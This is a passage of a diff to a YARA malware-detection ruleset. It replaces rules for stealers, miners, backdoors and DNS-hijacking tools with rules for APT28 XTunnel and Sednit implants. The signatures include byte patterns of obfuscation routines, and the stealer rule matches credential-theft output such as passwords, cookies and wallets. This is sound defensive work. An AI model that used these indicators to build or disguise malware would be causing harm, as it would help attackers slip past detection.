+		$key49 = { A2483197FA57271B43E7276238468CFB8429326CBDA7BD091461147F642BEB06 }
+		$key50 = { 731C9D6E74C589B7ACB019E5F6A6E07ACF12E68CB9A396CE05AA4D69D5387048 }
+		$key51 = { 540DB6C8D23F7F7FEF9964E53F445F0E56459B10E931DEEEDB2B57B063C7F8B7 }
+		$key52 = { D5AF80A7EEFF26DE988AC3D7CE23E62568813551B2133F8D3E973DA15E355833 }
+		$key53 = { E4D8DBD3D801B1708C74485A972E7F00AFB45161C791EE05282BA68660FFBA45 }
+		$key54 = { D79518AF96C920223D687DD596FCD545B126A678B7947EDFBF24661F232064FB }
+		$key55 = { B57CAA4B45CA6E8332EB58C8E72D0D9853B3110B478FEA06B35026D7708AD225 }
+		$key56 = { 077C714C47DFCF79CA2742B1544F4AA8035BB34AEA9D519DEE77745E01468408 }
+		$key57 = { C3F5550AD424839E4CC54FA015994818F4FB62DE99B37C872AF0E52C376934FA }
+		$key58 = { 5E890432AE87D0FA4D209A62B9E37AAEDEDC8C779008FEBAF9E4E6304D1B2AAC }
+		$key59 = { A42EDE52B5AF4C02CFE76488CADE36A8BBC3204BCB1E05C402ECF450071EFCAB }
+		$key60 = { 4CDAFE02894A04583169E1FB4717A402DAC44DA6E2536AE53F5F35467D31F1CA }
+		$key61 = { 0BEFCC953AD0ED6B39CE6781E60B83C0CFD166B124D1966330CBA9ADFC9A7708 }
+		$key62 = { 8A439DC4148A2F4D5996CE3FA152FF702366224737B8AA6784531480ED8C8877 }
+		$key63 = { CF253BE3B06B310901FF48A351471374AD35BBE4EE654B72B860F2A6EC7B1DBB }
+		$key64 = { A0599F50C4D059C5CFA16821E97C9596B1517B9FB6C6116F260415127F32CE1F }
+		$key65 = { 8B6D704F3DC9150C6B7D2D54F9C3EAAB14654ACA2C5C3952604E65DF8133FE0C }
+		$key66 = { A06E5CDD3871E9A3EE17F7E8DAE193EE47DDB87339F2C599402A78C15D77CEFD }
+		$key67 = { E52ADA1D9BC4C089DBB771B59904A3E0E25B531B4D18B58E432D4FA0A41D9E8A }
+		$key68 = { 4778A7E23C686C171FDDCCB8E26F98C4CBEBDF180494A647C2F6E7661385F05B }
+		$key69 = { FE983D3A00A9521F871ED8698E702D595C0C7160A118A7630E8EC92114BA7C12 }
+		$key70 = { 52BA4C52639E71EABD49534BBA80A4168D15762E2D1D913BAB5A5DBF14D9D166 }
+		$key71 = { 931EB8F7BC2AE1797335C42DB56843427EB970ABD601E7825C4441701D13D7B1 }
+		$key72 = { 318FA8EDB989672DBE2B5A74949EB6125727BD2E28A4B084E8F1F50604CCB735 }
+		$key73 = { 5B5F2315E88A42A7B59C1B493AD15B92F819C021BD70A5A6619AAC6666639BC2 }
+		$key74 = { C2BED7AA481951FEB56C47F03EA38236BC425779B2FD1F1397CB79FE2E15C0F0 }
+		$key75 = { D3979B1CB0EC1A655961559704D7CDC019253ACB2259DFB92558B7536D774441 }
+		$key76 = { 0EDF5DBECB772424D879BBDD51899D6AAED736D0311589566D41A9DBB8ED1CC7 }
+		$key77 = { CC798598F0A9BCC82378A5740143DEAF1A147F4B2908A197494B7202388EC905 }
+		$key78 = { 074E9DF7F859BF1BD1658FD2A86D81C282000EAB09AF4252FAB45433421D3849 }
+		$key79 = { 6CD540642E007F00650ED20D7B54CFFD54DDA95D8DEBB087A004BAE222F22C8E }
+		$key80 = { C76CF2F66C71F6D17FC8DEFA1CAEF8718BA1CE188C7EA02C835A0FA54D3B3314 }
+		$key81 = { A7250A149600E515C9C40FE5720756FDA8251635A3B661261070CB5DABFE7253 }
+		$key82 = { 237C67B97D4CCE4610DE2B82E582808EA796C34A4C24715C953CBA403B2C935E }
+		$key83 = { A8FA182547E66B57C497DAAA195A38C0F0FB0A3C1F7B98B4B852F5F37E885127 }
+		$key84 = { 83694CCA50B821144FFBBE6855F62845F1328111AE1AC5666CBA59EB43AA12C6 }
+		$key85 = { 145E906416B17865AD37CD022DF5481F28C930D6E3F53C50B0953BF33F4DB953 }
+		$key86 = { AB49B7C2FA3027A767F5AA94EAF2B312BBE3E89FD924EF89B92A7CF977354C22 }
+		$key87 = { 7E04E478340C209B01CA2FEBBCE3FE77C6E6169F0B0528C42FA4BDA6D90AC957 }
+		$key88 = { 0EADD042B9F0DDBABA0CA676EFA4EDB68A045595097E5A392217DFFC21A8532F }
+		$key89 = { 5623710F134ECACD5B70434A1431009E3556343ED48E77F6A557F2C7FF46F655 }
+		$key90 = { 6968657DB62F4A119F8E5CB3BF5C51F4B285328613AA7DB9016F8000B576561F }
+		$key91 = { DEBB9C95EAE6A68974023C335F8D2711135A98260415DF05845F053AD65B59B4 }
+		$key92 = { 16F54900DBF08950F2C5835153AB636605FB8C09106C0E94CB13CEA16F275685 }
+		$key93 = { 1C9F86F88F0F4882D5CBD32876368E7B311A84418692D652A6A4F315CC499AE8 }
+		$key94 = { E920E0783028FA05F4CE2D6A04BBE636D56A775CFD4DAEA3F2A1B8BEEB52A6D4 }
+		$key95 = { 73874CA3AF47A8A315D50E1990F44F655EC7C15B146FFE0611B6C4FC096BD07C }
+		$key96 = { F21C1FA163C745789C53922C47E191A5A85301BDC2FFC3D3B688CFBFF39F3BE5 }
+		$key97 = { BC5A861F21CB98BD1E2AE9650B7A0BB4CD0C71900B3463C1BC3380AFD2BB948E }
+		$key98 = { 151BAE36E646F30570DC6A7B57752F2481A0B48DD5184E914BCF411D8AD5ACA0 }
+		$key99 = { F05AD6D7A0CADC10A6468BFDBCBB223D5BD6CA30EE19C239E8035772D80312C9 }
+		$key100 = { 5DE9A0FDB37C0D59C298577E5379BCAF4F86DF3E9FA17787A4CEFA7DD10C462E }
+		$key101 = { F5E62BA862380224D159A324D25FD321E5B35F8554D70CF9A506767713BCA508 }
+		$key102 = { A2D1B10409B328DA0CCBFFDE2AD2FF10855F95DA36A1D3DBA84952BB05F8C3A7 }
+		$key103 = { C974ABD227D3AD339FAC11C97E11D904706EDEA610B181B8FAD473FFCC36A695 }
+		$key104 = { AB5167D2241406C3C0178D3F28664398D5213EE5D2C09DCC9410CB604671F5F1 }
+		$key105 = { C25CC4E671CAAA31E137700A9DB3A272D4E157A6A1F47235043D954BAE8A3C70 }
+		$key106 = { E6005757CA0189AC38F9B6D5AD584881399F28DA949A0F98D8A4E3862E20F715 }
+		$key107 = { 204E6CEB4FF59787EF4D5C9CA5A41DDF4445B9D8E0C970B86D543E9C7435B194 }
+		$key108 = { 831D7FD21316590263B69E095ABBE89E01A176E16AE799D83BD774AF0D254390 }
+		$key109 = { 42C36355D9BC573D72F546CDB12E6BB2CFE2933AC92C12040386B310ABF6A1ED }
+		$key110 = { B9044393C09AD03390160041446BF3134D864D16B25F1AB5E5CDC690C4677E7D }
+		$key111 = { 6BC1102B5BE05EEBF65E2C3ACA1F4E17A59B2E57FB480DE016D371DA3AEF57A5 }
+		$key112 = { B068D00B482FF73F8D23795743C76FE8639D405EE54D3EFB20AFD55A9E2DFF4E }
+		$key113 = { 95CF5ADDFE511C8C7496E3B75D52A0C0EFE01ED52D5DD04D0CA6A7ABD3A6F968 }
+		$key114 = { 75534574A4620019F8E3D055367016255034FA7D91CBCA9E717149441742AC8D }
+		$key115 = { 96F1013A5301534BE424A11A94B740E5EB3A627D052D1B769E64BAB6A666433C }
+		$key116 = { 584477AB45CAF729EE9844834F84683ABECAB7C4F7D23A9636F54CDD5B8F19B3 }
+		$key117 = { D3905F185B564149EE85CC3D093477C8FF2F8CF601C68C38BBD81517672ECA3A }
+		$key118 = { BF29521A7F94636D1930AA236422EB6351775A523DE68AF9BF9F1026CEDA618D }
+		$key119 = { 04B3A783470AF1613A9B849FBD6F020EE65C612343EB1C028B2C28590789E60B }
+		$key120 = { 3D8D8E84977FE5D21B6971D8D873E7BED048E21333FE15BE2B3D1732C7FD3D04 }
+		$key121 = { 8ACB88224B6EF466D7653EB0D8256EA86D50BBA14FD05F7A0E77ACD574E9D9FF }
+		$key122 = { B46121FFCF1565A77AA45752C9C5FB3716B6D8658737DF95AE8B6A2374432228 }
+		$key123 = { A4432874588D1BD2317224FB371F324DD60AB25D4191F2F01C5C13909F35B943 }
+		$key124 = { 78E1B7D06ED2A2A044C69B7CE6CDC9BCD77C19180D0B082A671BBA06507349C8 }
+		$key125 = { 540198C3D33A631801FE94E7CB5DA3A2D9BCBAE7C7C3112EDECB342F3F7DF793 }
+		$key126 = { 7E905652CAB96ACBB7FEB2825B55243511DF1CD8A22D0680F83AAF37B8A7CB36 }
+		$key127 = { 37218801DBF2CD92F07F154CD53981E6189DBFBACAC53BC200EAFAB891C5EEC8 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		any of them
 }
-rule SIGNATURE_BASE_APT_MAL_CISA_10365227_01_APPSTORAGE_Dec21 : APPSTORAGE FILE
+rule SIGNATURE_BASE_IMPLANT_5_V3
 {
 	meta:
-		description = "Detects AppStorage ntstatus msexch samples"
-		author = "CISA Code & Media Analysis"
-		id = "a44c5609-980f-5961-921c-6b1824cdd49c"
-		date = "2021-12-23"
-		modified = "2021-12-24"
-		reference = "https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stealer_cisa_ar22_277a.yar#L25-L46"
+		description = "XTunnel Implant by APT28"
+		author = "US CERT"
+		id = "0763e314-85d0-5c16-b766-36298176e0ff"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1194-L1207"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6a46bc4efa1f22d9fc65d946dbaa7b94de6074e65c228373bb6001f152d5b603"
-		score = 80
+		logic_hash = "aec1314858732d30b62a033e85eea50b3375e4f5b0e1818a941979d5be672297"
+		score = 85
 		quality = 85
-		tags = "APPSTORAGE, FILE"
-		family = "APPSTORAGE"
-		hash1 = "157a0ffd18e05bfd90a4ec108e5458cbde01015e3407b3964732c9d4ceb71656"
-		hash2 = "30191b3badf3cdbc65d0ffeb68e0f26cef10a41037351b0f562ab52fce7432cc"
-
-	strings:
-		$s1 = "026B924DD52F8BE4A3FEE8575DC"
-		$s2 = "GetHDDId"
-		$s3 = "AppStorage"
-		$s4 = "AppDomain"
-		$s5 = "$1e3e5580-d264-4c30-89c9-8933c948582c"
-		$s6 = "hrjio2mfsdlf235d" wide
-
-	condition:
-		uint16( 0 ) == 0x5a4d and all of them
-}
-rule SIGNATURE_BASE_APT_MAL_CISA_10365227_02_Clientuploader_Dec21 : FILE
-{
-	meta:
-		description = "Detects ClientUploader_mqsvn"
-		author = "CISA Code & Media Analysis"
-		id = "84351df9-e225-5c3f-9385-523246681a97"
-		date = "2021-12-23"
-		modified = "2021-12-24"
-		reference = "https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stealer_cisa_ar22_277a.yar#L48-L67"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f9f82b4577568d0bd60bac0d3132ed7ffcb338f508a8689f3126f3d2440432ef"
-		score = 80
-		quality = 81
-		tags = "FILE"
-		hash1 = "3585c3136686d7d48e53c21be61bb2908d131cf81b826acf578b67bb9d8e9350"
+		tags = ""
 
 	strings:
-		$s1 = "UploadSmallFileWithStopWatch"
-		$s2 = "UploadPartWithStopwatch"
-		$s3 = "AppVClient"
-		$s4 = "ClientUploader"
-		$s5 = { 46 69 6C 65 43 6F 6E 74 61 69 6E 65 72 2E 46 69 6C 65 41 72 63 68 69 76 65 }
-		$s6 = { 4F 6E 65 44 72 69 76 65 43 6C 69 65 6E 74 2E 4F 6E 65 44 72 69 76 65 }
+		$BYTES1 = { 0F AF C0 6? C0 07 00 00 00 2D 01 00 00 00 0F AF ?? 39 ?8 }
+		$BYTES2 = { 0F AF C0 6? C0 07 48 0F AF ?? 39 ?8 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		any of them
 }
-rule SIGNATURE_BASE_Cobaltgang_PDF_Metadata_Rev_A
+rule SIGNATURE_BASE_IMPLANT_5_V4
 {
 	meta:
-		description = "Find documents saved from the same potential Cobalt Gang PDF template"
-		author = "Palo Alto Networks Unit 42"
-		id = "bcf5bf6e-c786-5f78-bf58-e0631a17e62e"
-		date = "2018-10-25"
-		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/10/unit42-new-techniques-uncover-attribute-cobalt-gang-commodity-builders-infrastructure-revealed/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cobalt_gang_pdf.yar#L1-L12"
+		description = "XTunnel Implant by APT28"
+		author = "US CERT"
+		id = "db6df7ea-f119-5e9a-bcea-c65580418042"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1209-L1225"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8020ccff761b49d98e18cd5cb3c0695956a88e86a0958bfba1a19b7e3e629bb9"
-		score = 75
+		logic_hash = "98a08860453496d9629f62c64fed50a24b8378dcfa39b8b654610c2ac9084fa8"
+		score = 85
 		quality = 85
 		tags = ""
 
 	strings:
-		$ = "<xmpMM:DocumentID>uuid:31ac3688-619c-4fd4-8e3f-e59d0354a338" ascii wide
+		$FBKEY1 = { 987AB999FE0924A2DF0A412B14E26093746FCDF9BA31DC05536892C33B116AD3 }
+		$FBKEY2 = { 8B236C892D902B0C9A6D37AE4F9842C3070FBDC14099C6930158563C6AC00FF5 }
+		$FBKEY3 = { E47B7F110CAA1DA617545567EC972AF3A6E7B4E6807B7981D3CFBD3D8FCC3373 }
+		$FBKEY4 = { 48B284545CA1FA74F64FDBE2E605D68CED8A726D05EBEFD9BAAC164A7949BDC1 }
+		$FBKEY5 = { FB421558E30FCCD95FA7BC45AC92D2991C44072230F6FBEAA211341B5BF2DC56 }
 
 	condition:
-		any of them
+		all of them
 }
-
-rule SIGNATURE_BASE_Kaspermalware_Oct17_1 : FILE
+rule SIGNATURE_BASE_IMPLANT_6_V1 : FILE
 {
 	meta:
-		description = "Detects Kasper Backdoor"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7201d8ee-50ee-5a5c-a5b8-ee36c78b0d6e"
-		date = "2017-10-24"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_kasper_oct17.yar#L13-L30"
+		description = "Sednit / EVILTOSS Implant by APT28"
+		author = "US CERT"
+		id = "0554ec8e-f45d-5afc-8874-dc8adfac5cdf"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1227-L1243"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "15758407fb3039f1453f13d579d7df9525645e4717078f6b1fa482ab335e3a56"
-		score = 75
+		logic_hash = "c60402a029034545df302485c14e9485f806f2bc7d5fd759e84d1ecba9854837"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "758bdaf26a0bd309a5458cb4569fe1c789cf5db087880d6d1676dec051c3a28d"
 
 	strings:
-		$x1 = "\\Release\\kasper.pdb" ascii
-		$x2 = "C:\\D@oc@um@en@ts a@nd Set@tings\\Al@l Users" wide
+		$STR1 = "dll.dll" wide ascii
+		$STR2 = "Init1" wide ascii
+		$STR3 = "netui.dll" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 7000KB and ( pe.imphash ( ) == "2bceb64cf37acd34bc33b38f2cddfb61" or 1 of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_DNS_Hijacking_Campaign_AA19_024A : FILE
+rule SIGNATURE_BASE_IMPLANT_6_V2 : FILE
 {
 	meta:
-		description = "Detects malware used in DNS Hijackign campaign"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6a476052-ba4e-5049-9c7a-f8949d26e7b5"
-		date = "2019-01-25"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/AA19-024A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_aa19_024a.yar#L2-L19"
+		description = "Sednit / EVILTOSS Implant by APT28"
+		author = "US CERT"
+		id = "59bfbef2-ff0e-59df-9d08-15001cec8ecf"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1245-L1258"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8e9ec132df6cf6a89f6694682292feec0f3a762c2df6b1dc8180d9ab68e7183b"
-		score = 75
+		logic_hash = "7e81e8bcc305b9b7166db85d81278c96edf232bf60040ef15a2376f204ca3046"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		hash1 = "2010f38ef300be4349e7bc287e720b1ecec678cacbf0ea0556bcf765f6e073ec"
-		hash2 = "45a9edb24d4174592c69d9d37a534a518fbe2a88d3817fc0cc739e455883b8ff"
 
 	strings:
-		$s2 = "/Client/Login?id=" fullword ascii
-		$s3 = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" fullword ascii
-		$s4 = ".\\Configure.txt" fullword ascii
-		$s5 = "Content-Disposition: form-data; name=\"files\"; filename=\"" fullword ascii
-		$s6 = "Content-Disposition: form-data; name=\"txts\"" fullword ascii
+		$obf_func = { 8B 45 F8 6A 07 03 C7 33 D2 89 45 E8 8D 47 01 5B 02 4D 0F F7 F3 6A 07 8A 04 32 33 D2 F6 E9 8A C8 8B C7 F7 F3 8A 44 3E FE 02 45 FC 02 0C 32 B2 03 F6 EA 8A D8 8D 47 FF 33 D2 5F F7 F7 02 5D 14 8B 45 E8 8B 7D F4 C0 E3 06 02 1C 32 32 CB 30 08 8B 4D 14 41 47 83 FF 09 89 4D 14 89 7D F4 72 A1 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_SUSP_MAL_EXFIL_Stealer_Output_Characteristics_Sep22_1 : FILE
+rule SIGNATURE_BASE_IMPLANT_6_V3 : FILE
 {
 	meta:
-		description = "Detects typical stealer output files as created by RedLine or Racoon stealer"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c1cab3c3-c4f3-5a19-9ea3-9e4242238359"
-		date = "2022-09-17"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cglyer/status/1570965878480719873"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_stealer_exfil_zip.yar#L2-L30"
+		description = "Sednit / EVILTOSS Implant by APT28"
+		author = "US CERT"
+		id = "db090bc5-a90f-5b66-8fcb-29b423dddbf7"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1260-L1275"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "197bb4b837cdd635f9340547b10a90c3a2a17f0113076c5ccbc0a91b7ae18eeb"
-		score = 70
+		logic_hash = "833a6a3a4ff8ca43d4cf8053bfd1da49df96d9833dd3fe0f3ffbf6ce6c114681"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		hash1 = "8ce14c6b720281f43c75ce52e23ec13d08e7b2be1c5fbc2d704238f1fdd1a07f"
-		hash2 = "011c19d18fa446a2619b3a2512dacb2694e1da99a2c2ea7828769f1373ecd8fe"
-		hash3 = "418530bc7210f74ada8e7f16b41ea2033054e99f0c4423ce1d3ebf973c89e3a3"
-		hash4 = "aa6e2c8447f66527f9b6f4d54f57edc6cabe56095df94dc0656dca02e11356ab"
-		hash5 = "bbfb608061931565debac405ffebe3c4bb5dac8042443fe4e80aa03395955bd2"
-		hash6 = "c15107beecf3301fb12d140690034717e16bd5312a746e7ff43a7925e5533260"
 
 	strings:
-		$sa1 = "passwords.txt" ascii
-		$sa2 = "autofills/" ascii
-		$sa3 = "browsers/cookies/" ascii
-		$sa4 = "wallets/" ascii
-		$sb1 = "Passwords.txt" ascii
-		$sb2 = "Autofills/" ascii
-		$sb3 = "Browsers/Cookies/" ascii
-		$sb4 = "Wallets/" ascii
+		$deob_func = { 8D 46 01 02 D1 83 E0 07 8A 04 38 F6 EA 8B D6 83 E2 07 0A
+         04 3A 33 D2 8A 54 37 FE 03 D3 03 D1 D3 EA 32 C2 8D 56 FF 83 E2 07 8A
+         1C 3A 8A 14 2E 32 C3 32 D0 41 88 14 2E 46 83 FE 0A 7C ?? }
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 5000KB and ( 2 of ( $sa* ) or 2 of ( $sb* ) )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-
-rule SIGNATURE_BASE_MAL_XMR_Miner_May19_1 : HIGHVOL FILE
+rule SIGNATURE_BASE_IMPLANT_6_V4 : FILE
 {
 	meta:
-		description = "Detects Monero Crypto Coin Miner"
-		author = "Florian Roth (Nextron Systems)"
-		id = "233d1d47-de67-55a9-ae7e-46b5dd34e6ce"
-		date = "2019-05-31"
-		modified = "2023-12-05"
-		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_nansh0u.yar#L15-L36"
+		description = "Sednit / EVILTOSS Implant by APT28"
+		author = "US CERT"
+		id = "27118ec8-3713-5670-88d2-3ac57c155c0d"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1277-L1291"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "85a65fd2355850b7f5261ad41091e181562938356ba3dae7d867f7ac8922a16e"
+		logic_hash = "f5388668e148223bc94680ea84e83b0f2896ccf433523d171c8f46d7069f9a4b"
 		score = 85
 		quality = 85
-		tags = "HIGHVOL, FILE"
-		hash1 = "d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc"
+		tags = "FILE"
 
 	strings:
-		$x1 = "donate.ssl.xmrig.com" fullword ascii
-		$x2 = "* COMMANDS     'h' hashrate, 'p' pause, 'r' resume" fullword ascii
-		$s1 = "[%s] login error code: %d" fullword ascii
-		$s2 = "\\\\?\\pipe\\uv\\%p-%lu" fullword ascii
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 14000KB and ( pe.imphash ( ) == "25d9618d1e16608cd5d14d8ad6e1f98e" or 1 of ( $x* ) or 2 of them )
-}
-
-rule SIGNATURE_BASE_HKTL_CN_Prochook_May19_1 : FILE
-{
-	meta:
-		description = "Detects hacktool used by Chinese threat groups"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ae4e2613-8254-5ea6-af88-2f08ebe4da33"
-		date = "2019-05-31"
-		modified = "2023-12-05"
-		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_nansh0u.yar#L38-L49"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "de55990c130702a05e96ee769707a81ce0ec58a515d75a9a99b20265ce3db682"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		hash1 = "02ebdc1ff6075c15a44711ccd88be9d6d1b47607fea17bef7e5e17f8da35293e"
+		$ASM = {53 5? 5? [6-15] ff d? 8b ?? b? a0 86 01 00 [7-13] ff d? ?b
+         [6-10] c0 [0-1] c3}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and pe.imphash ( ) == "343d580dd50ee724746a5c28f752b709"
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_SUSP_PDB_CN_Threat_Actor_May19_1 : FILE
+rule SIGNATURE_BASE_IMPLANT_6_V5 : FILE
 {
 	meta:
-		description = "Detects PDB path user name used by Chinese threat actors"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fc6969ed-5fc1-5b3b-9659-c6fc1c9e2f9c"
-		date = "2019-05-31"
-		modified = "2023-12-05"
-		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_nansh0u.yar#L52-L65"
+		description = "Sednit / EVILTOSS Implant by APT28"
+		author = "US CERT"
+		id = "d035eaff-8c2a-53a2-b629-6448b2bcc9f6"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1293-L1327"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "adcfe3d4bc6fcaf6be4f70c91fb2150bfa2d61f1ba84f96a0bf0c39ed0380b6a"
-		score = 65
+		logic_hash = "b3ba650818ddbc58ce272ae4851ae3151a8cf1c9cc6f8e234a50b52c95d951fe"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		hash1 = "01c3882e8141a25abe37bb826ab115c52fd3d109c4a1b898c0c78cee8dac94b4"
 
 	strings:
-		$x1 = "C:\\Users\\zcg\\Desktop\\" ascii
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
-}
-
-rule SIGNATURE_BASE_MAL_Ramnit_May19_1 : FILE
-{
-	meta:
-		description = "Detects Ramnit malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f8fa3557-556e-5680-9f1a-2ecf118ade75"
-		date = "2019-05-31"
-		modified = "2023-12-05"
-		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_nansh0u.yar#L67-L78"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "51d574f457c37eba3c29f869e03244b9471be6f6c8319aa0ddfad34be748eb53"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		hash1 = "d7ec3fcd80b3961e5bab97015c91c843803bb915c13a4a35dfb5e9bdf556c6d3"
+		$STR1 = { 83 EC 18 8B 4C 24 24 B8 AB AA AA AA F7 E1 8B 44 24 20 53 55 8B
+         EA 8D 14 08 B8 AB AA AA AA 89 54 24 1C F7 E2 56 8B F2 C1 ED 02 8B DD
+         57 8B 7C 24 38 89 6C 24 1C C1 EE 02 3B DE 89 5C 24 18 89 74 24 20 0F
+         83 CF 00 00 00 8D 14 5B 8D 44 12 FE 89 44 24 10 3B DD 0F 85 CF 00 00
+         00 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B CA 83 F9 06 89 4C 24 38 0F 83
